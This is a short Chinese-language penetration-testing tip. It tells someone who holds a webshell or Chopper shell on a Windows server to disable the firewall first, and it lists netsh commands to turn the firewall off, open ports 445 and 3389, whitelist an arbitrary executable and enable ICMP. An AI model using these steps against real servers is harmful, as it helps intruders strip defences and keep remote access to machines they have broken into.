通过webshell或者chopper执行命令,如果权限可以,是可以看到的。该方法只针对windows系统。
在正常情况下,如果渗透windows服务器,都会因为防火墙造成很多麻烦,而且都无从查找原因。
所以,如果获得shell权限,第一件事先干掉防火墙。
查看状态:
show state
开启防火墙:
netsh firewall set opmode mode=enable
关闭防火墙:
netsh firewall set opmode mode=disable
例如命令:
netsh firewall show allowedprogram //查看防火墙放行的程序
netsh firewall set portopening TCP 445 ENABLE //打开445端口
netsh firewall set portopening TCP 3389 ENABLE //
netsh firewall delete allowedprogram C:\A.exe //删除放行程序A.exe
netsh firewall set allowedprogram C:\A.exe A ENABLE //添加程序C盘下的A.exe并放行
netsh firewall set icmpsetting type=ALL mode=enable //开启ICMP协议
netsh firewall set icmpsettting type=2 mode=enable //允许出站数据包太大